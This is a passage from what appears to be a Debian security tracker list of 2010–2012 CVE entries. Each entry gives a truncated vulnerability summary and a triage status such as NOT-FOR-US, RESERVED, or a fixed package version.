HTTrack 3.43-9 allows local ...) - httrack (Only affects Windows) CVE-2010-5251 (Multiple untrusted search path vulnerabilities in IBM Lotus Notes 8.5 ...) NOT-FOR-US: IBM Lotus Notes CVE-2010-5250 (Untrusted search path vulnerability in the ...) NOT-FOR-US: Pthreads-win32 CVE-2010-5249 (Untrusted search path vulnerability in Sophos Free Encryption 2.40.1.1 ...) NOT-FOR-US: Sophos Free Encryption CVE-2010-5248 (Untrusted search path vulnerability in UltraVNC 1.0.8.2 allows local ...) NOT-FOR-US: UltraVNC CVE-2010-5247 (Untrusted search path vulnerability in QtWeb Browser 3.3 build 043 ...) NOT-FOR-US: QtWeb Browser CVE-2010-5246 (Multiple untrusted search path vulnerabilities in Maxthon Browser ...) NOT-FOR-US: Maxthon Browser CVE-2010-5245 (Untrusted search path vulnerability in PDF-XChange Viewer 2.0 Build ...) NOT-FOR-US: PDF-XChange Viewer CVE-2010-5244 (Untrusted search path vulnerability in SiSoftware Sandra 2010 Lite ...) NOT-FOR-US: SiSoftware Sandra CVE-2010-5243 (Multiple untrusted search path vulnerabilities in Cyberlink Power2Go ...) NOT-FOR-US: Cyberlink Power2Go CVE-2010-5242 (Untrusted search path vulnerability in Sound Forge Pro 10.0b Build 474 ...) NOT-FOR-US: Sound Forge Pro CVE-2010-5241 (Multiple untrusted search path vulnerabilities in Autodesk AutoCAD ...) NOT-FOR-US: Autodesk AutoCAD CVE-2010-5240 (Multiple untrusted search path vulnerabilities in Corel PHOTO-PAINT ...) NOT-FOR-US: Corel PHOTO-PAINT and CorelDRAW CVE-2010-5239 (Untrusted search path vulnerability in DAEMON Tools Lite 4.35.6.0091 ...) NOT-FOR-US: DAEMON Tools Lite and Pro Standard CVE-2010-5238 (Untrusted search path vulnerability in CyberLink PowerDirector ...) NOT-FOR-US: CyberLink PowerDirector CVE-2010-5237 (Untrusted search path vulnerability in CyberLink PowerDirector 7 ...) NOT-FOR-US: CyberLink PowerDirector CVE-2010-5236 (Untrusted search path vulnerability in Roxio Easy Media Creator Home ...) NOT-FOR-US: Roxio Easy Media Creator Home CVE-2010-5235 (Untrusted search path vulnerability in IZArc Archiver 4.1.2 allows ...) NOT-FOR-US: IZArc Archiver CVE-2010-5234 (Multiple untrusted search path vulnerabilities in Camtasia Studio ...) NOT-FOR-US: Camtasia Studio CVE-2010-5233 (Untrusted search path vulnerability in Virtual DJ 6.1.2 Trial b301 ...) NOT-FOR-US: Virtual DJ CVE-2010-5232 (Untrusted search path vulnerability in DivX Plus Player 8.1.0 allows ...) NOT-FOR-US: DivX Plus Player CVE-2010-5231 (Untrusted search path vulnerability in DivX Player 7.2.019 allows ...) NOT-FOR-US: DivX Player CVE-2010-5230 (Multiple untrusted search path vulnerabilities in MicroStation 7.1 ...) NOT-FOR-US: MicroStation CVE-2010-5229 (Untrusted search path vulnerability in 010 Editor before 3.1.3 allows ...) NOT-FOR-US: 010 Editor CVE-2010-5228 (Untrusted search path vulnerability in RealPlayer SP 1.1.5 12.0.0.879 ...) NOT-FOR-US: RealPlayer SP CVE-2010-5227 (Untrusted search path vulnerability in Opera before 10.62 allows local ...) NOT-FOR-US: Opera CVE-2010-5226 (Multiple untrusted search path vulnerabilities in Autodesk Design ...) NOT-FOR-US: Autodesk Design Review CVE-2012-4759 (Untrusted search path vulnerability in facebook_plugin.fpi in the ...) NOT-FOR-US: Foxit Reader CVE-2012-4758 (Multiple untrusted search path vulnerabilities in CyberLink ...) NOT-FOR-US: CyberLink PowerProducer CVE-2012-4757 (Multiple untrusted search path vulnerabilities in CyberLink ...) NOT-FOR-US: CyberLink StreamAuthor CVE-2012-4756 (Multiple untrusted search path vulnerabilities in CyberLink LabelPrint ...) NOT-FOR-US: CyberLink LabelPrint CVE-2012-4755 (Untrusted search path vulnerability in SciTools Understand before 2.6 ...) NOT-FOR-US: SciTools Unterstand CVE-2012-4754 (Multiple untrusted search path vulnerabilities in MindManager 2012 ...) NOT-FOR-US: MindManager CVE-2011-5157 (Untrusted search path vulnerability in Attachmate Reflection before ...) NOT-FOR-US: Attachmate Reflection CVE-2011-5156 (Untrusted search path vulnerability in Effective File Search 6.7 ...) NOT-FOR-US: Effective File Search CVE-2011-5155 (Untrusted search path vulnerability in Help & Manual 5.5.1 Build 1296 ...) NOT-FOR-US: Help & Manual 5.5.1 Build CVE-2011-5154 (Multiple untrusted search path vulnerabilities in (1) SAPGui.exe and ...) NOT-FOR-US: SAP GUI CVE-2011-5153 (Untrusted search path vulnerability in FotoSlate 4.0 Build 146 allows ...) NOT-FOR-US: FotoSlate CVE-2011-5152 (Multiple untrusted search path vulnerabilities in ACDSee Photo Editor ...) NOT-FOR-US: ACDSee Photo Editor CVE-2011-5151 (Untrusted search path vulnerability in ACDSee Picture Frame Manager ...) NOT-FOR-US: ACDSee Picture Frame Manager CVE-2010-5225 (Untrusted search path vulnerability in Babylon 8.1.0 r16 allows local ...) NOT-FOR-US: Babylon 8.1.0 CVE-2010-5224 (Untrusted search path vulnerability in Cool iPhone Ringtone Maker ...) NOT-FOR-US: Cool iPhone Ringtone Maker CVE-2010-5223 (Multiple untrusted search path vulnerabilities in Phoenix Project ...) NOT-FOR-US: Phoenix Project Manager CVE-2010-5222 (Untrusted search path vulnerability in Ease Jukebox 1.40 allows local ...) NOT-FOR-US: Ease Jukebox CVE-2010-5221 (Untrusted search path vulnerability in STDU Explorer 1.0.201 allows ...) NOT-FOR-US: STDU Explorer CVE-2010-5220 (Untrusted search path vulnerability in MEO Encryption Software 2.02 ...) NOT-FOR-US: MEO Encryption Software CVE-2010-5219 (Untrusted search path vulnerability in SmartFTP 4.0.1140.0 allows ...) NOT-FOR-US: SmartFTP CVE-2010-5218 (Untrusted search path vulnerability in Dupehunter 9.0.0.3911 allows ...) NOT-FOR-US: Dupehunter CVE-2010-5217 (Multiple untrusted search path vulnerabilities in TuneUp Utilities ...) NOT-FOR-US: TuneUp Utilities CVE-2010-5216 (Untrusted search path vulnerability in LINGO 11.0.1.6 and 12.0.2.20 ...) NOT-FOR-US: LINGO CVE-2010-5215 (Multiple untrusted search path vulnerabilities in SWiSH Max3 3.0 ...) NOT-FOR-US: SWiSH Max3 CVE-2010-5214 (Untrusted search path vulnerability in Fotobook Editor 5.0 2.8.0.1 ...) NOT-FOR-US: Fotobook Editor CVE-2010-5213 (Untrusted search path vulnerability in Adobe LiveCycle Designer ...) NOT-FOR-US: Adobe LiveCycle Designer CVE-2010-5212 (Untrusted search path vulnerability in Adobe LiveCycle Designer ES2 ...) NOT-FOR-US: Adobe LiveCycle Designer ES2 CVE-2010-5211 (Untrusted search path vulnerability in ALSee 6.20.0.1 allows local ...) NOT-FOR-US: ALSee CVE-2010-5210 (Untrusted search path vulnerability in Sorax Reader 2.0.3129.70 allows ...) NOT-FOR-US: Sorax Reader CVE-2010-5209 (Multiple untrusted search path vulnerabilities in Nuance PDF Reader ...) NOT-FOR-US: Nuance PDF Reader CVE-2010-5208 (Multiple untrusted search path vulnerabilities in the (1) ...) NOT-FOR-US: Kingsoft Office CVE-2010-5207 (Multiple untrusted search path vulnerabilities in CelFrame Office 2008 ...) NOT-FOR-US: CelFrame Office CVE-2010-5206 (Multiple untrusted search path vulnerabilities in e-press ONE Office ...) NOT-FOR-US: ONE Office CVE-2010-5205 (Multiple untrusted search path vulnerabilities in e-press ONE Office ...) NOT-FOR-US: ONE Office CVE-2010-5204 (Multiple untrusted search path vulnerabilities in IBM Lotus Symphony ...) NOT-FOR-US: IBM Lotus Symphony CVE-2010-5203 (Multiple untrusted search path vulnerabilities in NCP Secure ...) NOT-FOR-US: NCP Secure Enterprise CVE-2010-5202 (Untrusted search path vulnerability in JetAudio 8.0.7.1000 Basic ...) NOT-FOR-US: JetAudio CVE-2010-5201 (Untrusted search path vulnerability in MAGIX Samplitude Producer 11 ...) NOT-FOR-US: MAGIX Samplitude Producer CVE-2010-5200 (Untrusted search path vulnerability in KeePass Password Safe before ...) - keepassx (only affects Windows) CVE-2010-5199 (Untrusted search path vulnerability in PhotoImpact X3 13.00.0000.0 ...) NOT-FOR-US: PhotoImpact CVE-2010-5198 (Multiple untrusted search path vulnerabilities in Intuit QuickBooks ...) NOT-FOR-US: Intuit QuickBooks CVE-2010-5197 (Untrusted search path vulnerability in Pixia 4.70j allows local users ...) NOT-FOR-US: Pixia 4.70j CVE-2010-5196 (Untrusted search path vulnerability in KeePass Password Safe before ...) - keepassx (only affects Windows) CVE-2010-5195 (Untrusted search path vulnerability in Roxio MyDVD 9 allows local ...) NOT-FOR-US: Roxio MyDVD 9 CVE-2012-4410 RESERVED NOTE: to be rejected CVE-2012-4753 (Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud ...) NOTE: http://www.openwall.com/lists/oss-security/2012/09/05/17 NOTE: False assignment, will be rejected, see #688123 CVE-2012-4752 (appconfig.php in ownCloud before 4.0.6 does not properly restrict ...) - owncloud 4.0.7debian-1 [wheezy] - owncloud 4.0.4debian2-2 NOTE: http://www.openwall.com/lists/oss-security/2012/09/05/17 CVE-2012-4751 (Cross-site scripting (XSS) vulnerability in Open Ticket Request System ...) - otrs2 3.1.7+dfsg1-6 CVE-2012-4750 RESERVED CVE-2012-4749 RESERVED CVE-2012-4748 RESERVED CVE-2011-3090 (Race condition in Google Chrome before 19.0.1084.46 allows remote ...) - chromium-browser 20.0.1132.21~r139451-1 CVE-2012-4746 (Cross-site request forgery (CSRF) vulnerability in accessaccount.cgi ...) NOT-FOR-US: ZTE ZXDSL CVE-2012-4745 (Cross-site scripting (XSS) vulnerability in admin/login.asp in Acuity ...) NOT-FOR-US: Acuity CMS CVE-2012-4744 (Cross-site scripting (XSS) vulnerability in ssearch.php in the Siche ...) NOT-FOR-US: Zeroboard CVE-2012-4743 (Multiple SQL injection vulnerabilities in ssearch.php in Siche search ...) NOT-FOR-US: Zeroboard CVE-2012-4742 (The web_node_register function in web.pm in PacketFence before 3.0.2 ...) NOT-FOR-US: PacketFence CVE-2012-4741 (The RADIUS extension in PacketFence before 3.3.0 uses a different user ...) NOT-FOR-US: PacketFence CVE-2012-4740 (Cross-site scripting (XSS) vulnerability in the captive portal in ...) NOT-FOR-US: PacketFence CVE-2012-4739 (Multiple cross-site scripting (XSS) vulnerabilities in Barracuda SSL ...) NOT-FOR-US: Barracuda SSL VPN CVE-2012-4738 RESERVED CVE-2011-5150 (Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.07 ...) NOT-FOR-US: SpamTitan 5.07 CVE-2011-5149 (Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.08 ...) NOT-FOR-US: SpamTitan 5.08 CVE-2011-5148 (Multiple incomplete blacklist vulnerabilities in the Simple File ...) NOT-FOR-US: Simple File Upload CVE-2011-5147 (Static code injection vulnerability in ajax_save_name.php in the Ajax ...) NOT-FOR-US: tinymce plugin CVE-2011-5145 (Multiple SQL injection vulnerabilities in Open Business Management ...) NOT-FOR-US: Open Business Management CVE-2011-5144 (Open Business Management (OBM) 2.4.0-rc13 and earlier allows remote ...) NOT-FOR-US: Open Business Management CVE-2011-5143 (Multiple cross-site scripting (XSS) vulnerabilities in Open Business ...) NOT-FOR-US: Open Business Management CVE-2011-5142 (Multiple cross-site scripting (XSS) vulnerabilities in Open Business ...) NOT-FOR-US: Open Business Management CVE-2011-5141 (Directory traversal vulnerability in exportcsv/exportcsv_index.php in ...) NOT-FOR-US: Open Business Management CVE-2011-5140 (Multiple SQL injection vulnerabilities in the blog module 1.0 for ...) NOT-FOR-US: DIY CMS CVE-2011-5139 (SQL injection vulnerability in page.php in Pre Studio Business Cards ...) NOT-FOR-US: Pre Studio Business Cards Designer CVE-2011-5138 (Cross-site scripting (XSS) vulnerability in member.php in tForum ...) NOT-FOR-US: tForum CVE-2011-5137 (Multiple SQL injection vulnerabilities in tForum b0.915 allow remote ...) NOT-FOR-US: tForum CVE-2010-5194 (Stack-based buffer overflow in the Image2PDF function in the ...) NOT-FOR-US: Viscom Image Viewer CP Pro CVE-2010-5193 (Stack-based buffer overflow in the TIFMergeMultiFiles function in the ...) NOT-FOR-US: Viscom Image Viewer CP Pro CVE-2012-4736 (The Device Encryption Client component in Sophos SafeGuard Enterprise ...) NOT-FOR-US: Sophos SafeGuard Enterprise CVE-2012-4735 RESERVED {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2012-4734 (Request Tracker (RT) 3.8.x before 3.8.15 and 4.0.x before 4.0.8 allows ...) {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2012-4733 RESERVED CVE-2012-4732 (Cross-site request forgery (CSRF) vulnerability in Request Tracker ...) {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2012-4731 (FAQ manager for Request Tracker (RTFM) before 2.4.5 does not properly ...) {DSA-2568-1} - rtfm - request-tracker4 4.0.7-2 CVE-2012-4730 (Request Tracker (RT) 3.8.x before 3.8.15 and 4.0.x before 4.0.8 allows ...) {DSA-2567-1} - request-tracker3.8 - request-tracker4 4.0.7-2 CVE-2012-4729 (Wing FTP Server before 4.1.1 allows remote authenticated users to ...) NOT-FOR-US: Wing FTP Server CVE-2012-4728 RESERVED CVE-2012-4727 RESERVED CVE-2012-4726 RESERVED CVE-2012-4725 RESERVED CVE-2012-4724 RESERVED CVE-2012-4723 RESERVED CVE-2012-4722 RESERVED CVE-2012-4721 RESERVED CVE-2012-4720 RESERVED CVE-2012-4719 RESERVED CVE-2012-4718 RESERVED CVE-2012-4717 RESERVED CVE-2012-4716 RESERVED CVE-2012-4715 (Buffer overflow in LogReceiver.exe in Rockwell Automation RSLinx ...) NOT-FOR-US: Rockwell Automation RSLinx Enterprise CVE-2012-4714 (Integer overflow in RNADiagnostics.dll in Rockwell Automation ...) NOT-FOR-US: Rockwell Automation FactoryTalk Services Platform CVE-2012-4713 (Integer signedness error in RNADiagnostics.dll in Rockwell Automation ...) NOT-FOR-US: Rockwell Automation FactoryTalk Services Platform CVE-2012-4712 (Moxa EDR-G903 series routers with firmware before 2.11 have a ...) NOT-FOR-US: Moxa EDR-G903 CVE-2012-4711 (Buffer overflow in kingMess.exe 65.20.2003.10300 in WellinTech ...) NOT-FOR-US: WellinTech KingView CVE-2012-4710 (Invensys Wonderware Win-XML Exporter 1522.148.0.0 allows remote ...) NOT-FOR-US: Invensys Wonderware Win-XML Exporter CVE-2012-4709 RESERVED CVE-2012-4708 (Stack-based buffer overflow in 3S CODESYS Gateway-Server before ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4707 (3S CODESYS Gateway-Server before 2.3.9.27 allows remote attackers to ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4706 (Integer signedness error in 3S CODESYS Gateway-Server before 2.3.9.27 ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4705 (Directory traversal vulnerability in 3S CODESYS Gateway-Server before ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4704 (Array index error in 3S CODESYS Gateway-Server before 2.3.9.27 allows ...) NOT-FOR-US: 3S CODESYS Gateway-Server CVE-2012-4703 (The Emerson DeltaV SE3006 through 11.3.1, DeltaV VE3005 through 10.3.1 ...) NOT-FOR-US: Emerson DeltaV CVE-2012-4702 (360 Systems Maxx, Image Server Maxx, and Image Server 2000 have a ...) NOT-FOR-US: 360 Systems Maxx, Image Server Maxx, and Image Server CVE-2012-4701 (Directory traversal vulnerability in Tridium Niagara AX 3.5, 3.6, and ...) NOT-FOR-US: Tridium Niagara CVE-2012-4700 (Multiple buffer overflows in an ActiveX control in PE3DO32A.ocx in ...) NOT-FOR-US: IntegraXor SCADA Server CVE-2012-4699 RESERVED CVE-2012-4698 (Siemens RuggedCom Rugged Operating System (ROS) before 3.12, ROX I OS ...) NOT-FOR-US: Siemens RuggedCom Rugged Operating System CVE-2012-4697 RESERVED CVE-2012-4696 (Buffer overflow in Beijer ADP 6.5.0-180_R1967 and 6.5.1-186_R2942, and ...) NOT-FOR-US: Beijer CVE-2012-4695 (LogReceiver.exe in Rockwell Automation RSLinx Enterprise CPR9, ...) NOT-FOR-US: Rockwell Automation RSLinx Enterprise CVE-2012-4694 (Moxa EDR-G903 series routers with firmware before 2.11 do not use a ...) NOT-FOR-US: Moxa EDR-G903 CVE-2012-4693 (Invensys Wonderware InTouch 2012 R2 and earlier and Siemens ...) NOT-FOR-US: Invensys Wonderware InTouch CVE-2012-4692 RESERVED CVE-2012-4691 (Memory leak in Siemens Automation License Manager (ALM) 4.x and 5.x ...) NOT-FOR-US: Siemens Automation License Manager CVE-2012-4690 (Rockwell Automation Allen-Bradley MicroLogix controller 1100, 1200, ...) NOT-FOR-US: Rockwell CVE-2012-4689 (Integer overflow in CimWebServer.exe in GE Intelligent Platforms ...) NOT-FOR-US: Proficy CVE-2012-4688 (The Central application in i-GEN opLYNX before 2.01.9 allows remote ...) NOT-FOR-US: Central application in i-GEN opLYNX CVE-2012-4687 (Post Oak AWAM Bluetooth Reader Traffic System does not use a ...) NOT-FOR-US: Post Oak CVE-2012-4686 (SQL injection vulnerability in announcement.php in vBulletin 4.1.10 ...) NOT-FOR-US: vBulletin CVE-2012-4685 (Cross-site scripting (XSS) vulnerability in Arbor Networks Peakflow SP ...) NOT-FOR-US: Arbor Networks Peakflow SP CVE-2012-4684 (The alert functionality in bitcoind and Bitcoin-Qt before 0.7.0 ...) - bitcoin 0.7.2-1 CVE-2012-4683 (Unspecified vulnerability in bitcoind and Bitcoin-Qt allows attackers ...) - bitcoin 0.7.2-1 (bug #688813) CVE-2012-4682 (Unspecified vulnerability in bitcoind and Bitcoin-Qt allows attackers ...) - bitcoin 0.7.2-1 (bug #688813) CVE-2011-5136 (showImg.php in EPractize Labs Subscription Manager, possibly 1.0, ...) NOT-FOR-US: EPractize Labs Subscription Manager CVE-2011-5135 (Multiple SQL injection vulnerabilities in the save_connection function ...) NOT-FOR-US: DoceboLMS CVE-2011-5134 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: JCE component for Joomla! CVE-2011-5133 (Unspecified vulnerability in MyBB before 1.6.5 has unknown impact and ...) NOT-FOR-US: MyBB CVE-2011-5132 (Cross-site scripting (XSS) vulnerability in MyBB before 1.6.5 allows ...) NOT-FOR-US: MyBB CVE-2011-5131 (Cross-site request forgery (CSRF) vulnerability in global.php in MyBB ...) NOT-FOR-US: MyBB CVE-2011-5130 (dev/less.php in Family Connections CMS (FCMS) 2.5.0 - 2.7.1, when ...) NOT-FOR-US: Family Connections CMS CVE-2011-5129 (Heap-based buffer overflow in XChat 2.8.9 and earlier allows remote ...) - xchat (unimportant; bug #686454) CVE-2011-5128 (Multiple cross-site scripting (XSS) vulnerabilities in the Adminimize ...) NOT-FOR-US: Adminimize plugin for Wordpress CVE-2012-4737 (channels/chan_iax2.c in Asterisk Open Source 1.8.x before 1.8.15.1 and ...) {DSA-2550-1} - asterisk 1:1.8.13.1~dfsg-1 (bug #680470) CVE-2012-XXXX - juju 0.5.1-2 (bug #685728) CVE-2012-4681 (Multiple vulnerabilities in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.2-1 - openjdk-6 CVE-2012-4680 (Directory traversal vulnerability in the XML Server in IOServer before ...) NOT-FOR-US: IOServer CVE-2012-4679 (Cross-site scripting (XSS) vulnerability in admin/login.php in ...) - newscoop (bug #604113) CVE-2012-4678 (munin-cgi-graph for Munin 2.0 rc4 does not delete temporary files, ...) - munin 2.0~rc6-1 (low; bug #668667) [squeeze] - munin (Only affects 2.x branch) CVE-2012-4677 (Tunnelblick 3.3beta20 and earlier allows local users to gain ...) NOT-FOR-US: Tunnelblick CVE-2012-4676 (The errorExitIfAttackViaString function in Tunnelblick 3.3beta20 and ...) NOT-FOR-US: Tunnelblick CVE-2012-4675 (Cross-site scripting (XSS) vulnerability in PluXml 5.1.6 allows remote ...) NOT-FOR-US: PluXml CVE-2012-4674 (PluXml before 5.1.6 allows remote attackers to obtain the installation ...) NOT-FOR-US: PluXml CVE-2012-4673 (SQL injection vulnerability in application/controllers/invoice.php in ...) NOT-FOR-US: Neoinvoice CVE-2012-4672 (Apple iChat Server does not verify that a request was made for an XMPP ...) NOT-FOR-US: Apple iChat Server CVE-2012-4671 (psyced before 20120821 does not verify that a request was made for an ...) NOT-FOR-US: psyced CVE-2012-4670 (Tigase XMPP Server before 5.1.0 does not verify that a request was ...) NOT-FOR-US: Tigase CVE-2012-4669 (M-Link R14.6 before R14.6v14 and R15.1 before R15.1v10 does not verify ...) NOT-FOR-US: M-Link CVE-2012-4666 RESERVED CVE-2012-4665 RESERVED CVE-2012-4664 RESERVED CVE-2012-4663 (The DCERPC inspection engine on Cisco Adaptive Security Appliances ...) NOT-FOR-US: Cisco CVE-2012-4662 (The DCERPC inspection engine on Cisco Adaptive Security Appliances ...) NOT-FOR-US: Cisco CVE-2012-4661 (Stack-based buffer overflow in the DCERPC inspection engine on Cisco ...) NOT-FOR-US: Cisco CVE-2012-4660 (The SIP inspection engine on Cisco Adaptive Security Appliances (ASA) ...) NOT-FOR-US: Cisco CVE-2012-4659 (The AAA functionality in the IPv4 SSL VPN implementations on Cisco ...) NOT-FOR-US: Cisco CVE-2012-4658 RESERVED CVE-2012-4657 RESERVED CVE-2012-4656 RESERVED CVE-2012-4655 (The WebLaunch feature in Cisco Secure Desktop before 3.6.6020 does not ...) NOT-FOR-US: Cisco Secure Desktop CVE-2012-4654 RESERVED CVE-2012-4653 RESERVED CVE-2012-4652 RESERVED CVE-2012-4651 RESERVED CVE-2012-4650 RESERVED CVE-2012-4649 RESERVED CVE-2012-4648 RESERVED CVE-2012-4647 RESERVED CVE-2012-4646 RESERVED CVE-2012-4645 RESERVED CVE-2012-4644 RESERVED CVE-2012-4643 (The DHCP server on Cisco Adaptive Security Appliances (ASA) 5500 ...) NOT-FOR-US: Cisco CVE-2012-4642 RESERVED CVE-2012-4641 RESERVED CVE-2012-4640 RESERVED CVE-2012-4639 RESERVED CVE-2012-4638 RESERVED CVE-2012-4637 RESERVED CVE-2012-4636 RESERVED CVE-2012-4635 RESERVED CVE-2012-4634 RESERVED CVE-2012-4633 RESERVED CVE-2012-4632 RESERVED CVE-2012-4631 RESERVED CVE-2012-4630 RESERVED CVE-2012-4629 (The Cisco ASA-CX Context-Aware Security module before 9.0.2-103 for ...) NOT-FOR-US: Cisco ASA CVE-2012-4628 RESERVED CVE-2012-4627 RESERVED CVE-2012-4626 RESERVED CVE-2012-4625 RESERVED CVE-2012-4624 RESERVED CVE-2012-4623 (The DHCPv6 server in Cisco IOS 12.2 through 12.4 and 15.0 through 15.2 ...) NOT-FOR-US: Cisco IOS CVE-2012-4622 (Cisco IOS XE 03.02.00.XO.15.0(2)XO on Catalyst 4500E series switches, ...) NOT-FOR-US: Cisco IOS CVE-2012-4621 (The Device Sensor feature in Cisco IOS 15.0 through 15.2 allows remote ...) NOT-FOR-US: Cisco IOS CVE-2012-4620 (Cisco IOS 12.2 and 15.0 through 15.2 on Cisco 10000 series routers, ...) NOT-FOR-US: Cisco IOS CVE-2012-4619 (The NAT implementation in Cisco IOS 12.2, 12.4, and 15.0 through 15.2 ...) NOT-FOR-US: Cisco IOS CVE-2012-4618 (The SIP ALG feature in the NAT implementation in Cisco IOS 12.2, 12.4, ...) NOT-FOR-US: Cisco IOS CVE-2012-4617 (The BGP implementation in Cisco IOS 15.2, IOS XE 3.5.xS before 3.5.2S, ...) NOT-FOR-US: Cisco IOS CVE-2012-4616 (Directory traversal vulnerability in the Web UI in EMC Data Protection ...) NOT-FOR-US: EMC Data Protection Advisor CVE-2012-4615 (EMC Smarts Network Configuration Manager (NCM) before 9.1 uses a ...) NOT-FOR-US: EMC CVE-2012-4614 (The default configuration of EMC Smarts Network Configuration Manager ...) NOT-FOR-US: EMC CVE-2012-4613 (EMC RSA Data Protection Manager Appliance 2.7.x and 3.x before 3.2.1 ...) NOT-FOR-US: EMC RSA Data Protection Manager Appliance CVE-2012-4612 (Cross-site scripting (XSS) vulnerability in EMC RSA Data Protection ...) NOT-FOR-US: EMC RSA Data Protection Manager Appliance CVE-2012-4611 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA ...) NOT-FOR-US: EMC CVE-2012-4610 (EMC Avamar Client for VMware 6.1 stores the cleartext server root ...) NOT-FOR-US: VMware CVE-2012-4609 (The web interface in EMC RSA NetWitness Informer before 2.0.5.6 allows ...) NOT-FOR-US: EMC RSA NetWitness Informer CVE-2012-4608 (Cross-site request forgery (CSRF) vulnerability in the web interface ...) NOT-FOR-US: EMC RSA NetWitness Informer CVE-2012-4607 (Buffer overflow in nsrindexd in EMC NetWorker 7.5.x and 7.6.x before ...) NOT-FOR-US: EMC NetWorker CVE-2011-5127 (Directory traversal vulnerability in Blue Coat Reporter 9.x before ...) NOT-FOR-US: Blue Coat CVE-2011-5126 (Blue Coat ProxySG 6.1 before SGOS 6.1.5.1 and 6.2 before SGOS 6.2.2.1 ...) NOT-FOR-US: Blue Coat CVE-2011-5125 (Cross-site scripting (XSS) vulnerability in Blue Coat Director before ...) NOT-FOR-US: Blue Coat CVE-2011-5124 (Stack-based buffer overflow in the BCAAA component before build 60258, ...) NOT-FOR-US: Blue Coat CVE-2011-5123 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2011-5122 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2011-5121 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2011-5120 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2011-5119 (Multiple race conditions in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2011-5118 (Multiple race conditions in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2010-5192 (Cross-site scripting (XSS) vulnerability in the Java Management ...) NOT-FOR-US: Blue Coat CVE-2010-5191 (Multiple cross-site request forgery (CSRF) vulnerabilities on the Blue ...) NOT-FOR-US: Blue Coat CVE-2010-5190 (The Active Content Transformation functionality in Blue Coat ProxySG ...) NOT-FOR-US: Blue Coat CVE-2010-5189 (Blue Coat ProxySG before SGOS 4.3.4.1, 5.x before SGOS 5.4.5.1, 5.5 ...) NOT-FOR-US: Blue Coat CVE-2010-5188 (SilverStripe 2.3.x before 2.3.6 allows remote attackers to obtain ...) - silverstripe (bug #528461) CVE-2010-5187 (SilverStripe 2.3.x before 2.3.8 and 2.4.x before 2.4.1, when running ...) - silverstripe (bug #528461) CVE-2010-5186 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2010-5185 (The Antivirus component in Comodo Internet Security before ...) NOT-FOR-US: Comodo Internet Security CVE-2010-5184 (** DISPUTED ** Race condition in ZoneAlarm Extreme Security ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5183 (** DISPUTED ** Race condition in Webroot Internet Security Essentials ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5182 (** DISPUTED ** Race condition in VirusBuster Internet Security Suite ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5181 (** DISPUTED ** Race condition in VIPRE Antivirus Premium 4.0.3272 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5180 (** DISPUTED ** Race condition in VBA32 Personal 3.12.12.4 on Windows ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5179 (** DISPUTED ** Race condition in Trend Micro Internet Security Pro ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5178 (** DISPUTED ** Race condition in ThreatFire 4.7.0.17 on Windows XP ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5177 (** DISPUTED ** Race condition in Sophos Endpoint Security and Control ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5176 (** DISPUTED ** Race condition in Security Shield 2010 13.0.16.313 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5175 (** DISPUTED ** Race condition in PrivateFirewall 7.0.20.37 on Windows ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5174 (** DISPUTED ** Race condition in Prevx 3.0.5.143 on Windows XP allows ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5173 (** DISPUTED ** Race condition in PC Tools Firewall Plus 6.0.0.88 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5172 (** DISPUTED ** Race condition in Panda Internet Security 2010 15.01.00 ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5171 (** DISPUTED ** Race condition in Outpost Security Suite Pro ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5170 (** DISPUTED ** Race condition in Online Solutions Security Suite ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5169 (** DISPUTED ** Race condition in Online Armor Premium 4.0.0.35 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5168 (** DISPUTED ** Race condition in Symantec Norton Internet Security ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5167 (** DISPUTED ** Race condition in Norman Security Suite PRO 8.0 on ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5166 (** DISPUTED ** Race condition in McAfee Total Protection 2010 10.0.580 ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5165 (** DISPUTED ** Race condition in Malware Defender 2.6.0 on Windows XP ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5164 (** DISPUTED ** Race condition in KingSoft Personal Firewall 9 Plus ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5163 (** DISPUTED ** Race condition in Kaspersky Internet Security 2010 ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5162 (** DISPUTED ** Race condition in G DATA TotalCare 2010 on Windows XP ...) NOT-FOR-US: Anti virus snake oil CVE-2010-5161 (** DISPUTED ** Race condition in F-Secure Internet Security 2010 